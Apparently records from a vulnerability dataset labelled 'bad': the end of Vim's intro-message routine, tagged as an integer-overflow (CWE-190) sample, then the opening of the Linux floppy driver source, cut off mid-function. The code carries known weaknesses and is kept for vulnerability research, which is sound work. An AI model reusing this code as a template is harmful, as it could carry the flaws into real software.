int l;
int clen;
#ifdef MODIFIED_BY
# define MODBY_LEN 150
char_u modby[MODBY_LEN];
if (*mesg == ' ')
{
vim_strncpy(modby, (char_u *)_("Modified by "), MODBY_LEN - 1);
l = (int)STRLEN(modby);
vim_strncpy(modby + l, (char_u *)MODIFIED_BY, MODBY_LEN - l - 1);
mesg = modby;
}
#endif
/* Center the message horizontally. */
col = vim_strsize(mesg);
if (add_version)
{
STRCPY(vers, mediumVersion);
if (highest_patch())
{
/* Check for 9.9x or 9.9xx, alpha/beta version */
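/* E.g. mediumVersion "8.0" with patch level 69 produces "8.0.69". */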
if (isalpha((int)vers[3]))
{
int len = (isalpha((int)vers[4])) ? 5 : 4;
sprintf((char *)vers + len, ".%d%s", highest_patch(),
mediumVersion + len);
}
else
sprintf((char *)vers + 3, ".%d", highest_patch());
}
col += (int)STRLEN(vers);
}
col = (Columns - col) / 2;
if (col < 0)
col = 0;
/* Split up in parts to highlight <> items differently. */
for (p = mesg; *p != NUL; p += l)
{
clen = 0;
for (l = 0; p[l] != NUL
&& (l == 0 || (p[l] != '<' && p[l - 1] != '>')); ++l)
{
#ifdef FEAT_MBYTE
if (has_mbyte)
{
clen += ptr2cells(p + l);
l += (*mb_ptr2len)(p + l) - 1;
}
else
#endif
clen += byte2cells(p[l]);
}
screen_puts_len(p, l, row, col, *p == '<' ? hl_attr(HLF_8) : attr);
col += clen;
}
/* Add the version number to the version line. */
if (add_version)
screen_puts(vers, row, col, 0);
}
/*
* ":intro": clear screen, display intro screen and wait for return.
*/
void
ex_intro(exarg_T *eap UNUSED)
{
screenclear();
intro_message(TRUE);
wait_return(TRUE);
}
| ./CrossVul/dataset_final_sorted/CWE-190/c/bad_3179_1 |
crossvul-cpp_data_bad_966_0 |
// SPDX-License-Identifier: GPL-2.0-only
/*
* linux/drivers/block/floppy.c
*
* Copyright (C) 1991, 1992 Linus Torvalds
* Copyright (C) 1993, 1994 Alain Knaff
* Copyright (C) 1998 Alan Cox
*/
/*
* 02.12.91 - Changed to static variables to indicate need for reset
* and recalibrate. This makes some things easier (output_byte reset
* checking etc), and means less interrupt jumping in case of errors,
* so the code is hopefully easier to understand.
*/
/*
* This file is certainly a mess. I've tried my best to get it working,
* but I don't like programming floppies, and I have only one anyway.
* Urgel. I should check for more errors, and do more graceful error
* recovery. Seems there are problems with several drives. I've tried to
* correct them. No promises.
*/
/*
* As with hd.c, all routines within this file can (and will) be called
* by interrupts, so extreme caution is needed. A hardware interrupt
* handler may not sleep, or a kernel panic will happen. Thus I cannot
* call "floppy-on" directly, but have to set a special timer interrupt
* etc.
*/
/*
* 28.02.92 - made track-buffering routines, based on the routines written
* by entropy@wintermute.wpi.edu (Lawrence Foard). Linus.
*/
/*
* Automatic floppy-detection and formatting written by Werner Almesberger
* (almesber@nessie.cs.id.ethz.ch), who also corrected some problems with
* the floppy-change signal detection.
*/
/*
* 1992/7/22 -- Hennus Bergman: Added better error reporting, fixed
* FDC data overrun bug, added some preliminary stuff for vertical
* recording support.
*
* 1992/9/17: Added DMA allocation & DMA functions. -- hhb.
*
* TODO: Errors are still not counted properly.
*/
/* 1992/9/20
* Modifications for ``Sector Shifting'' by Rob Hooft (hooft@chem.ruu.nl)
* modeled after the freeware MS-DOS program fdformat/88 V1.8 by
* Christoph H. Hochst\"atter.
* I have fixed the shift values to the ones I always use. Maybe a new
* ioctl() should be created to be able to modify them.
* There is a bug in the driver that makes it impossible to format a
* floppy as the first thing after bootup.
*/
/*
* 1993/4/29 -- Linus -- cleaned up the timer handling in the kernel, and
* this helped the floppy driver as well. Much cleaner, and still seems to
* work.
*/
/* 1994/6/24 --bbroad-- added the floppy table entries and made
* minor modifications to allow 2.88 floppies to be run.
*/
/* 1994/7/13 -- Paul Vojta -- modified the probing code to allow three or more
* disk types.
*/
/*
* 1994/8/8 -- Alain Knaff -- Switched to fdpatch driver: Support for bigger
* format bug fixes, but unfortunately some new bugs too...
*/
/* 1994/9/17 -- Koen Holtman -- added logging of physical floppy write
* errors to allow safe writing by specialized programs.
*/
/* 1995/4/24 -- Dan Fandrich -- added support for Commodore 1581 3.5" disks
* by defining bit 1 of the "stretch" parameter to mean put sectors on the
* opposite side of the disk, leaving the sector IDs alone (i.e. Commodore's
* drives are "upside-down").
*/
/*
* 1995/8/26 -- Andreas Busse -- added Mips support.
*/
/*
* 1995/10/18 -- Ralf Baechle -- Portability cleanup; move machine dependent
* features to asm/floppy.h.
*/
/*
* 1998/1/21 -- Richard Gooch <rgooch@atnf.csiro.au> -- devfs support
*/
/*
* 1998/05/07 -- Russell King -- More portability cleanups; moved definition of
* interrupt and dma channel to asm/floppy.h. Cleaned up some formatting &
* use of '0' for NULL.
*/
/*
* 1998/06/07 -- Alan Cox -- Merged the 2.0.34 fixes for resource allocation
* failures.
*/
/*
* 1998/09/20 -- David Weinehall -- Added slow-down code for buggy PS/2-drives.
*/
/*
* 1999/08/13 -- Paul Slootman -- floppy stopped working on Alpha after 24
* days, 6 hours, 32 minutes and 32 seconds (i.e. MAXINT jiffies; ints were
* being used to store jiffies, which are unsigned longs).
*/
/*
* 2000/08/28 -- Arnaldo Carvalho de Melo <acme@conectiva.com.br>
* - get rid of check_region
* - s/suser/capable/
*/
/*
* 2001/08/26 -- Paul Gortmaker - fix insmod oops on machines with no
* floppy controller (lingering task on list after module is gone... boom.)
*/
/*
* 2002/02/07 -- Anton Altaparmakov - Fix io ports reservation to correct range
* (0x3f2-0x3f5, 0x3f7). This fix is a bit of a hack but the proper fix
* requires many non-obvious changes in arch dependent code.
*/
/* 2003/07/28 -- Daniele Bellucci <bellucda@tiscali.it>.
* Better audit of register_blkdev.
*/
#undef FLOPPY_SILENT_DCL_CLEAR
#define REALLY_SLOW_IO
#define DEBUGT 2
#define DPRINT(format, args...) \
pr_info("floppy%d: " format, current_drive, ##args)
#define DCL_DEBUG /* debug disk change line */
#ifdef DCL_DEBUG
#define debug_dcl(test, fmt, args...) \
do { if ((test) & FD_DEBUG) DPRINT(fmt, ##args); } while (0)
#else
#define debug_dcl(test, fmt, args...) \
do { if (0) DPRINT(fmt, ##args); } while (0)
#endif
/* do print messages for unexpected interrupts */
static int print_unex = 1;
#include <linux/module.h>
#include <linux/sched.h>
#include <linux/fs.h>
#include <linux/kernel.h>
#include <linux/timer.h>
#include <linux/workqueue.h>
#define FDPATCHES
#include <linux/fdreg.h>
#include <linux/fd.h>
#include <linux/hdreg.h>
#include <linux/errno.h>
#include <linux/slab.h>
#include <linux/mm.h>
#include <linux/bio.h>
#include <linux/string.h>
#include <linux/jiffies.h>
#include <linux/fcntl.h>
#include <linux/delay.h>
#include <linux/mc146818rtc.h> /* CMOS defines */
#include <linux/ioport.h>
#include <linux/interrupt.h>
#include <linux/init.h>
#include <linux/platform_device.h>
#include <linux/mod_devicetable.h>
#include <linux/mutex.h>
#include <linux/io.h>
#include <linux/uaccess.h>
#include <linux/async.h>
#include <linux/compat.h>
/*
* PS/2 floppies have much slower step rates than regular floppies.
* It's been recommended that they take about 1/4 of the default speed
* in some more extreme cases.
*/
static DEFINE_MUTEX(floppy_mutex);
static int slow_floppy;
#include <asm/dma.h>
#include <asm/irq.h>
static int FLOPPY_IRQ = 6;
static int FLOPPY_DMA = 2;
static int can_use_virtual_dma = 2;
/* =======
* can use virtual DMA:
* 0 = use of virtual DMA disallowed by config
* 1 = use of virtual DMA prescribed by config
* 2 = no virtual DMA preference configured. By default try hard DMA,
* but fall back on virtual DMA when not enough memory available
*/
static int use_virtual_dma;
/* =======
* use virtual DMA
* 0 using hard DMA
* 1 using virtual DMA
* This variable is set to virtual when a DMA mem problem arises, and
* reset back in floppy_grab_irq_and_dma.
* It is not safe to reset it in other circumstances, because the floppy
* driver may have several buffers in use at once, and we currently do not
* record each buffer's capabilities
*/
static DEFINE_SPINLOCK(floppy_lock);
static unsigned short virtual_dma_port = 0x3f0;
irqreturn_t floppy_interrupt(int irq, void *dev_id);
static int set_dor(int fdc, char mask, char data);
#define K_64 0x10000 /* 64KB */
/* the following is the mask of allowed drives. By default units 2 and
* 3 of both floppy controllers are disabled, because switching on the
* motor of these drives causes system hangs on some PCI computers. drive
* 0 is the low bit (0x1), and drive 7 is the high bit (0x80). Bits are on if
* a drive is allowed.
*
* NOTE: This must come before we include the arch floppy header because
* some ports reference this variable from there. -DaveM
*/
static int allowed_drive_mask = 0x33;
#include <asm/floppy.h>
static int irqdma_allocated;
#include <linux/blk-mq.h>
#include <linux/blkpg.h>
#include <linux/cdrom.h> /* for the compatibility eject ioctl */
#include <linux/completion.h>
static LIST_HEAD(floppy_reqs);
static struct request *current_req;
static int set_next_request(void);
#ifndef fd_get_dma_residue
#define fd_get_dma_residue() get_dma_residue(FLOPPY_DMA)
#endif
/* Dma Memory related stuff */
#ifndef fd_dma_mem_free
#define fd_dma_mem_free(addr, size) free_pages(addr, get_order(size))
#endif
#ifndef fd_dma_mem_alloc
#define fd_dma_mem_alloc(size) __get_dma_pages(GFP_KERNEL, get_order(size))
#endif
#ifndef fd_cacheflush
#define fd_cacheflush(addr, size) /* nothing... */
#endif
static inline void fallback_on_nodma_alloc(char **addr, size_t l)
{
#ifdef FLOPPY_CAN_FALLBACK_ON_NODMA
if (*addr)
return; /* we have the memory */
if (can_use_virtual_dma != 2)
return; /* no fallback allowed */
pr_info("DMA memory shortage. Temporarily falling back on virtual DMA\n");
*addr = (char *)nodma_mem_alloc(l);
#else
return;
#endif
}
/* End dma memory related stuff */
static unsigned long fake_change;
static bool initialized;
#define ITYPE(x) (((x) >> 2) & 0x1f)
#define TOMINOR(x) ((x & 3) | ((x & 4) << 5))
#define UNIT(x) ((x) & 0x03) /* drive on fdc */
#define FDC(x) (((x) & 0x04) >> 2) /* fdc of drive */
/* reverse mapping from unit and fdc to drive */
#define REVDRIVE(fdc, unit) ((unit) + ((fdc) << 2))
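/*
 * For illustration: drive 5 is unit 1 on fdc 1 (UNIT(5) == 1, FDC(5) == 1,
 * REVDRIVE(1, 1) == 5) and TOMINOR(5) == 0x81 -- the unit number lands in
 * the two low bits of the minor, the fdc number in bit 7, while ITYPE()
 * extracts the format type kept in bits 2..6.
 */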
#define DP (&drive_params[current_drive])
#define DRS (&drive_state[current_drive])
#define DRWE (&write_errors[current_drive])
#define FDCS (&fdc_state[fdc])
#define UDP (&drive_params[drive])
#define UDRS (&drive_state[drive])
#define UDRWE (&write_errors[drive])
#define UFDCS (&fdc_state[FDC(drive)])
#define PH_HEAD(floppy, head) (((((floppy)->stretch & 2) >> 1) ^ head) << 2)
#define STRETCH(floppy) ((floppy)->stretch & FD_STRETCH)
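/* PH_HEAD() flips the head number when stretch bit 1 (the "sides swapped"
 * Commodore format described below) is set, and shifts it into bit 2 so it
 * can be combined with the unit number in the drive-select byte of an FDC
 * command. */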
/* read/write */
#define COMMAND (raw_cmd->cmd[0])
#define DR_SELECT (raw_cmd->cmd[1])
#define TRACK (raw_cmd->cmd[2])
#define HEAD (raw_cmd->cmd[3])
#define SECTOR (raw_cmd->cmd[4])
#define SIZECODE (raw_cmd->cmd[5])
#define SECT_PER_TRACK (raw_cmd->cmd[6])
#define GAP (raw_cmd->cmd[7])
#define SIZECODE2 (raw_cmd->cmd[8])
#define NR_RW 9
/* format */
#define F_SIZECODE (raw_cmd->cmd[2])
#define F_SECT_PER_TRACK (raw_cmd->cmd[3])
#define F_GAP (raw_cmd->cmd[4])
#define F_FILL (raw_cmd->cmd[5])
#define NR_F 6
/*
* Maximum disk size (in kilobytes).
* This default is used whenever the current disk size is unknown.
* [Now it is rather a minimum]
*/
#define MAX_DISK_SIZE 4 /* 3984 */
/*
* globals used by 'result()'
*/
#define MAX_REPLIES 16
static unsigned char reply_buffer[MAX_REPLIES];
static int inr; /* size of reply buffer, when called from interrupt */
#define ST0 (reply_buffer[0])
#define ST1 (reply_buffer[1])
#define ST2 (reply_buffer[2])
#define ST3 (reply_buffer[0]) /* result of GETSTATUS */
#define R_TRACK (reply_buffer[3])
#define R_HEAD (reply_buffer[4])
#define R_SECTOR (reply_buffer[5])
#define R_SIZECODE (reply_buffer[6])
#define SEL_DLY (2 * HZ / 100)
/*
* this struct defines the different floppy drive types.
*/
static struct {
struct floppy_drive_params params;
const char *name; /* name printed while booting */
} default_drive_params[] = {
/* NOTE: the time values in jiffies should be in msec!
CMOS drive type
| Maximum data rate supported by drive type
| | Head load time, msec
| | | Head unload time, msec (not used)
| | | | Step rate interval, usec
| | | | | Time needed for spinup time (jiffies)
| | | | | | Timeout for spinning down (jiffies)
| | | | | | | Spindown offset (where disk stops)
| | | | | | | | Select delay
| | | | | | | | | RPS
| | | | | | | | | | Max number of tracks
| | | | | | | | | | | Interrupt timeout
| | | | | | | | | | | | Max nonintlv. sectors
| | | | | | | | | | | | | -Max Errors- flags */
{{0, 500, 16, 16, 8000, 1*HZ, 3*HZ, 0, SEL_DLY, 5, 80, 3*HZ, 20, {3,1,2,0,2}, 0,
0, { 7, 4, 8, 2, 1, 5, 3,10}, 3*HZ/2, 0 }, "unknown" },
{{1, 300, 16, 16, 8000, 1*HZ, 3*HZ, 0, SEL_DLY, 5, 40, 3*HZ, 17, {3,1,2,0,2}, 0,
0, { 1, 0, 0, 0, 0, 0, 0, 0}, 3*HZ/2, 1 }, "360K PC" }, /*5 1/4 360 KB PC*/
{{2, 500, 16, 16, 6000, 4*HZ/10, 3*HZ, 14, SEL_DLY, 6, 83, 3*HZ, 17, {3,1,2,0,2}, 0,
0, { 2, 5, 6,23,10,20,12, 0}, 3*HZ/2, 2 }, "1.2M" }, /*5 1/4 HD AT*/
{{3, 250, 16, 16, 3000, 1*HZ, 3*HZ, 0, SEL_DLY, 5, 83, 3*HZ, 20, {3,1,2,0,2}, 0,
0, { 4,22,21,30, 3, 0, 0, 0}, 3*HZ/2, 4 }, "720k" }, /*3 1/2 DD*/
{{4, 500, 16, 16, 4000, 4*HZ/10, 3*HZ, 10, SEL_DLY, 5, 83, 3*HZ, 20, {3,1,2,0,2}, 0,
0, { 7, 4,25,22,31,21,29,11}, 3*HZ/2, 7 }, "1.44M" }, /*3 1/2 HD*/
{{5, 1000, 15, 8, 3000, 4*HZ/10, 3*HZ, 10, SEL_DLY, 5, 83, 3*HZ, 40, {3,1,2,0,2}, 0,
0, { 7, 8, 4,25,28,22,31,21}, 3*HZ/2, 8 }, "2.88M AMI BIOS" }, /*3 1/2 ED*/
{{6, 1000, 15, 8, 3000, 4*HZ/10, 3*HZ, 10, SEL_DLY, 5, 83, 3*HZ, 40, {3,1,2,0,2}, 0,
0, { 7, 8, 4,25,28,22,31,21}, 3*HZ/2, 8 }, "2.88M" } /*3 1/2 ED*/
/* | --autodetected formats--- | | |
* read_track | | Name printed when booting
* | Native format
* Frequency of disk change checks */
};
static struct floppy_drive_params drive_params[N_DRIVE];
static struct floppy_drive_struct drive_state[N_DRIVE];
static struct floppy_write_errors write_errors[N_DRIVE];
static struct timer_list motor_off_timer[N_DRIVE];
static struct gendisk *disks[N_DRIVE];
static struct blk_mq_tag_set tag_sets[N_DRIVE];
static struct block_device *opened_bdev[N_DRIVE];
static DEFINE_MUTEX(open_lock);
static struct floppy_raw_cmd *raw_cmd, default_raw_cmd;
/*
* This struct defines the different floppy types.
*
* Bit 0 of 'stretch' tells if the tracks need to be doubled for some
* types (e.g. 360kB diskette in 1.2MB drive, etc.). Bit 1 of 'stretch'
* tells if the disk is in Commodore 1581 format, which means side 0 sectors
* are located on side 1 of the disk but with a side 0 ID, and vice-versa.
* This is the same as the Sharp MZ-80 5.25" CP/M disk format, except that the
* 1581's logical side 0 is on physical side 1, whereas the Sharp's logical
* side 0 is on physical side 0 (but with the misnamed sector IDs).
* 'stretch' should probably be renamed to something more general, like
* 'options'.
*
* Bits 2 through 9 of 'stretch' tell the number of the first sector.
* The LSB (bit 2) is flipped. For most disks, the first sector
* is 1 (represented by 0x00<<2). For some CP/M and music sampler
* disks (such as Ensoniq EPS 16plus) it is 0 (represented as 0x01<<2).
* For Amstrad CPC disks it is 0xC1 (represented as 0xC0<<2).
*
* Other parameters should be self-explanatory (see also setfdprm(8)).
*/
/*
Size
| Sectors per track
| | Head
| | | Tracks
| | | | Stretch
| | | | | Gap 1 size
| | | | | | Data rate, | 0x40 for perp
| | | | | | | Spec1 (stepping rate, head unload
| | | | | | | | /fmt gap (gap2) */
static struct floppy_struct floppy_type[32] = {
{ 0, 0,0, 0,0,0x00,0x00,0x00,0x00,NULL }, /* 0 no testing */
{ 720, 9,2,40,0,0x2A,0x02,0xDF,0x50,"d360" }, /* 1 360KB PC */
{ 2400,15,2,80,0,0x1B,0x00,0xDF,0x54,"h1200" }, /* 2 1.2MB AT */
{ 720, 9,1,80,0,0x2A,0x02,0xDF,0x50,"D360" }, /* 3 360KB SS 3.5" */
{ 1440, 9,2,80,0,0x2A,0x02,0xDF,0x50,"D720" }, /* 4 720KB 3.5" */
{ 720, 9,2,40,1,0x23,0x01,0xDF,0x50,"h360" }, /* 5 360KB AT */
{ 1440, 9,2,80,0,0x23,0x01,0xDF,0x50,"h720" }, /* 6 720KB AT */
{ 2880,18,2,80,0,0x1B,0x00,0xCF,0x6C,"H1440" }, /* 7 1.44MB 3.5" */
{ 5760,36,2,80,0,0x1B,0x43,0xAF,0x54,"E2880" }, /* 8 2.88MB 3.5" */
{ 6240,39,2,80,0,0x1B,0x43,0xAF,0x28,"E3120" }, /* 9 3.12MB 3.5" */
{ 2880,18,2,80,0,0x25,0x00,0xDF,0x02,"h1440" }, /* 10 1.44MB 5.25" */
{ 3360,21,2,80,0,0x1C,0x00,0xCF,0x0C,"H1680" }, /* 11 1.68MB 3.5" */
{ 820,10,2,41,1,0x25,0x01,0xDF,0x2E,"h410" }, /* 12 410KB 5.25" */
{ 1640,10,2,82,0,0x25,0x02,0xDF,0x2E,"H820" }, /* 13 820KB 3.5" */
{ 2952,18,2,82,0,0x25,0x00,0xDF,0x02,"h1476" }, /* 14 1.48MB 5.25" */
{ 3444,21,2,82,0,0x25,0x00,0xDF,0x0C,"H1722" }, /* 15 1.72MB 3.5" */
{ 840,10,2,42,1,0x25,0x01,0xDF,0x2E,"h420" }, /* 16 420KB 5.25" */
{ 1660,10,2,83,0,0x25,0x02,0xDF,0x2E,"H830" }, /* 17 830KB 3.5" */
{ 2988,18,2,83,0,0x25,0x00,0xDF,0x02,"h1494" }, /* 18 1.49MB 5.25" */
{ 3486,21,2,83,0,0x25,0x00,0xDF,0x0C,"H1743" }, /* 19 1.74 MB 3.5" */
{ 1760,11,2,80,0,0x1C,0x09,0xCF,0x00,"h880" }, /* 20 880KB 5.25" */
{ 2080,13,2,80,0,0x1C,0x01,0xCF,0x00,"D1040" }, /* 21 1.04MB 3.5" */
{ 2240,14,2,80,0,0x1C,0x19,0xCF,0x00,"D1120" }, /* 22 1.12MB 3.5" */
{ 3200,20,2,80,0,0x1C,0x20,0xCF,0x2C,"h1600" }, /* 23 1.6MB 5.25" */
{ 3520,22,2,80,0,0x1C,0x08,0xCF,0x2e,"H1760" }, /* 24 1.76MB 3.5" */
{ 3840,24,2,80,0,0x1C,0x20,0xCF,0x00,"H1920" }, /* 25 1.92MB 3.5" */
{ 6400,40,2,80,0,0x25,0x5B,0xCF,0x00,"E3200" }, /* 26 3.20MB 3.5" */
{ 7040,44,2,80,0,0x25,0x5B,0xCF,0x00,"E3520" }, /* 27 3.52MB 3.5" */
{ 7680,48,2,80,0,0x25,0x63,0xCF,0x00,"E3840" }, /* 28 3.84MB 3.5" */
{ 3680,23,2,80,0,0x1C,0x10,0xCF,0x00,"H1840" }, /* 29 1.84MB 3.5" */
{ 1600,10,2,80,0,0x25,0x02,0xDF,0x2E,"D800" }, /* 30 800KB 3.5" */
{ 3200,20,2,80,0,0x1C,0x00,0xCF,0x2C,"H1600" }, /* 31 1.6MB 3.5" */
};
#define SECTSIZE (_FD_SECTSIZE(*floppy))
/* Auto-detection: Disk type used until the next media change occurs. */
static struct floppy_struct *current_type[N_DRIVE];
/*
* User-provided type information. current_type points to
* the respective entry of this array.
*/
static struct floppy_struct user_params[N_DRIVE];
static sector_t floppy_sizes[256];
static char floppy_device_name[] = "floppy";
/*
* The driver is trying to determine the correct media format
* while probing is set. rw_interrupt() clears it after a
* successful access.
*/
static int probing;
/* Synchronization of FDC access. */
#define FD_COMMAND_NONE -1
#define FD_COMMAND_ERROR 2
#define FD_COMMAND_OKAY 3
static volatile int command_status = FD_COMMAND_NONE;
static unsigned long fdc_busy;
static DECLARE_WAIT_QUEUE_HEAD(fdc_wait);
static DECLARE_WAIT_QUEUE_HEAD(command_done);
/* Errors during formatting are counted here. */
static int format_errors;
/* Format request descriptor. */
static struct format_descr format_req;
/*
* Rate is 0 for 500kb/s, 1 for 300kbps, 2 for 250kbps
* Spec1 is 0xSH, where S is stepping rate (F=1ms, E=2ms, D=3ms etc),
* H is head unload time (1=16ms, 2=32ms, etc)
*/
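/*
 * Example: the 0xDF value used by several floppy_type[] entries above
 * encodes a 3ms stepping rate (S == 0xD) and the longest head unload
 * time (H == 0xF, i.e. 240ms).
 */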
/*
* Track buffer
* Because these are written to by the DMA controller, they must
* not contain a 64k byte boundary crossing, or data will be
* corrupted/lost.
*/
static char *floppy_track_buffer;
static int max_buffer_sectors;
static int *errors;
typedef void (*done_f)(int);
static const struct cont_t {
void (*interrupt)(void);
/* this is called after the interrupt of the
* main command */
void (*redo)(void); /* this is called to retry the operation */
void (*error)(void); /* this is called to tally an error */
done_f done; /* this is called to say if the operation has
* succeeded/failed */
} *cont;
static void floppy_ready(void);
static void floppy_start(void);
static void process_fd_request(void);
static void recalibrate_floppy(void);
static void floppy_shutdown(struct work_struct *);
static int floppy_request_regions(int);
static void floppy_release_regions(int);
static int floppy_grab_irq_and_dma(void);
static void floppy_release_irq_and_dma(void);
/*
* The "reset" variable should be tested whenever an interrupt is scheduled,
* after the commands have been sent. This is to ensure that the driver doesn't
* get wedged when the interrupt doesn't come because of a failed command.
* reset doesn't need to be tested before sending commands, because
* output_byte is automatically disabled when reset is set.
*/
static void reset_fdc(void);
/*
* These are global variables, as that's the easiest way to give
* information to interrupts. They are the data used for the current
* request.
*/
#define NO_TRACK -1
#define NEED_1_RECAL -2
#define NEED_2_RECAL -3
static atomic_t usage_count = ATOMIC_INIT(0);
/* buffer related variables */
static int buffer_track = -1;
static int buffer_drive = -1;
static int buffer_min = -1;
static int buffer_max = -1;
/* fdc related variables, should end up in a struct */
static struct floppy_fdc_state fdc_state[N_FDC];
static int fdc; /* current fdc */
static struct workqueue_struct *floppy_wq;
static struct floppy_struct *_floppy = floppy_type;
static unsigned char current_drive;
static long current_count_sectors;
static unsigned char fsector_t; /* sector in track */
static unsigned char in_sector_offset; /* offset within physical sector,
* expressed in units of 512 bytes */
static inline bool drive_no_geom(int drive)
{
return !current_type[drive] && !ITYPE(UDRS->fd_device);
}
#ifndef fd_eject
static inline int fd_eject(int drive)
{
return -EINVAL;
}
#endif
/*
* Debugging
* =========
*/
#ifdef DEBUGT
static long unsigned debugtimer;
static inline void set_debugt(void)
{
debugtimer = jiffies;
}
static inline void debugt(const char *func, const char *msg)
{
if (DP->flags & DEBUGT)
pr_info("%s:%s dtime=%lu\n", func, msg, jiffies - debugtimer);
}
#else
static inline void set_debugt(void) { }
static inline void debugt(const char *func, const char *msg) { }
#endif /* DEBUGT */
static DECLARE_DELAYED_WORK(fd_timeout, floppy_shutdown);
static const char *timeout_message;
static void is_alive(const char *func, const char *message)
{
/* this routine checks whether the floppy driver is "alive" */
if (test_bit(0, &fdc_busy) && command_status < 2 &&
!delayed_work_pending(&fd_timeout)) {
DPRINT("%s: timeout handler died. %s\n", func, message);
}
}
static void (*do_floppy)(void) = NULL;
#define OLOGSIZE 20
static void (*lasthandler)(void);
static unsigned long interruptjiffies;
static unsigned long resultjiffies;
static int resultsize;
static unsigned long lastredo;
static struct output_log {
unsigned char data;
unsigned char status;
unsigned long jiffies;
} output_log[OLOGSIZE];
static int output_log_pos;
#define current_reqD -1
#define MAXTIMEOUT -2
static void __reschedule_timeout(int drive, const char *message)
{
unsigned long delay;
if (drive == current_reqD)
drive = current_drive;
if (drive < 0 || drive >= N_DRIVE) {
delay = 20UL * HZ;
drive = 0;
} else
delay = UDP->timeout;
mod_delayed_work(floppy_wq, &fd_timeout, delay);
if (UDP->flags & FD_DEBUG)
DPRINT("reschedule timeout %s\n", message);
timeout_message = message;
}
static void reschedule_timeout(int drive, const char *message)
{
unsigned long flags;
spin_lock_irqsave(&floppy_lock, flags);
__reschedule_timeout(drive, message);
spin_unlock_irqrestore(&floppy_lock, flags);
}
#define INFBOUND(a, b) (a) = max_t(int, a, b)
#define SUPBOUND(a, b) (a) = min_t(int, a, b)
/*
* Bottom half floppy driver.
* ==========================
*
* This part of the file contains the code talking directly to the hardware,
* and also the main service loop (seek-configure-spinup-command)
*/
/*
* disk change.
* This routine is responsible for maintaining the FD_DISK_CHANGE flag,
* and the last_checked date.
*
* last_checked is the date of the last check which showed 'no disk change'
* FD_DISK_CHANGE is set under two conditions:
* 1. The floppy has been changed after some i/o to that floppy already
* took place.
* 2. No floppy disk is in the drive. This is done in order to ensure that
* requests are quickly flushed in case there is no disk in the drive. It
* follows that FD_DISK_CHANGE can only be cleared if there is a disk in
* the drive.
*
* For 1., maxblock is observed. Maxblock is 0 if no i/o has taken place yet.
* For 2., FD_DISK_NEWCHANGE is watched. FD_DISK_NEWCHANGE is cleared on
* each seek. If a disk is present, the disk change line should also be
* cleared on each seek. Thus, if FD_DISK_NEWCHANGE is clear, but the disk
* change line is set, this means either that no disk is in the drive, or
* that it has been removed since the last seek.
*
* This means that we really have a third possibility too:
* The floppy has been changed after the last seek.
*/
static int disk_change(int drive)
{
int fdc = FDC(drive);
if (time_before(jiffies, UDRS->select_date + UDP->select_delay))
DPRINT("WARNING disk change called early\n");
if (!(FDCS->dor & (0x10 << UNIT(drive))) ||
(FDCS->dor & 3) != UNIT(drive) || fdc != FDC(drive)) {
DPRINT("probing disk change on unselected drive\n");
DPRINT("drive=%d fdc=%d dor=%x\n", drive, FDC(drive),
(unsigned int)FDCS->dor);
}
debug_dcl(UDP->flags,
"checking disk change line for drive %d\n", drive);
debug_dcl(UDP->flags, "jiffies=%lu\n", jiffies);
debug_dcl(UDP->flags, "disk change line=%x\n", fd_inb(FD_DIR) & 0x80);
debug_dcl(UDP->flags, "flags=%lx\n", UDRS->flags);
if (UDP->flags & FD_BROKEN_DCL)
return test_bit(FD_DISK_CHANGED_BIT, &UDRS->flags);
if ((fd_inb(FD_DIR) ^ UDP->flags) & 0x80) {
set_bit(FD_VERIFY_BIT, &UDRS->flags);
/* verify write protection */
if (UDRS->maxblock) /* mark it changed */
set_bit(FD_DISK_CHANGED_BIT, &UDRS->flags);
/* invalidate its geometry */
if (UDRS->keep_data >= 0) {
if ((UDP->flags & FTD_MSG) &&
current_type[drive] != NULL)
DPRINT("Disk type is undefined after disk change\n");
current_type[drive] = NULL;
floppy_sizes[TOMINOR(drive)] = MAX_DISK_SIZE << 1;
}
return 1;
} else {
UDRS->last_checked = jiffies;
clear_bit(FD_DISK_NEWCHANGE_BIT, &UDRS->flags);
}
return 0;
}
static inline int is_selected(int dor, int unit)
{
return ((dor & (0x10 << unit)) && (dor & 3) == unit);
}
static bool is_ready_state(int status)
{
int state = status & (STATUS_READY | STATUS_DIR | STATUS_DMA);
return state == STATUS_READY;
}
static int set_dor(int fdc, char mask, char data)
{
unsigned char unit;
unsigned char drive;
unsigned char newdor;
unsigned char olddor;
if (FDCS->address == -1)
return -1;
olddor = FDCS->dor;
newdor = (olddor & mask) | data;
if (newdor != olddor) {
unit = olddor & 0x3;
if (is_selected(olddor, unit) && !is_selected(newdor, unit)) {
drive = REVDRIVE(fdc, unit);
debug_dcl(UDP->flags,
"calling disk change from set_dor\n");
disk_change(drive);
}
FDCS->dor = newdor;
fd_outb(newdor, FD_DOR);
unit = newdor & 0x3;
if (!is_selected(olddor, unit) && is_selected(newdor, unit)) {
drive = REVDRIVE(fdc, unit);
UDRS->select_date = jiffies;
}
}
return olddor;
}
static void twaddle(void)
{
if (DP->select_delay)
return;
fd_outb(FDCS->dor & ~(0x10 << UNIT(current_drive)), FD_DOR);
fd_outb(FDCS->dor, FD_DOR);
DRS->select_date = jiffies;
}
/*
* Reset all driver information about the current fdc.
* This is needed after a reset, and after a raw command.
*/
static void reset_fdc_info(int mode)
{
int drive;
FDCS->spec1 = FDCS->spec2 = -1;
FDCS->need_configure = 1;
FDCS->perp_mode = 1;
FDCS->rawcmd = 0;
for (drive = 0; drive < N_DRIVE; drive++)
if (FDC(drive) == fdc && (mode || UDRS->track != NEED_1_RECAL))
UDRS->track = NEED_2_RECAL;
}
/* selects the fdc and drive, and enables the fdc's input/dma. */
static void set_fdc(int drive)
{
if (drive >= 0 && drive < N_DRIVE) {
fdc = FDC(drive);
current_drive = drive;
}
if (fdc != 1 && fdc != 0) {
pr_info("bad fdc value\n");
return;
}
set_dor(fdc, ~0, 8);
#if N_FDC > 1
set_dor(1 - fdc, ~8, 0);
#endif
if (FDCS->rawcmd == 2)
reset_fdc_info(1);
if (fd_inb(FD_STATUS) != STATUS_READY)
FDCS->reset = 1;
}
/* locks the driver */
static int lock_fdc(int drive)
{
if (WARN(atomic_read(&usage_count) == 0,
"Trying to lock fdc while usage count=0\n"))
return -1;
if (wait_event_interruptible(fdc_wait, !test_and_set_bit(0, &fdc_busy)))
return -EINTR;
command_status = FD_COMMAND_NONE;
reschedule_timeout(drive, "lock fdc");
set_fdc(drive);
return 0;
}
/* unlocks the driver */
static void unlock_fdc(void)
{
if (!test_bit(0, &fdc_busy))
DPRINT("FDC access conflict!\n");
raw_cmd = NULL;
command_status = FD_COMMAND_NONE;
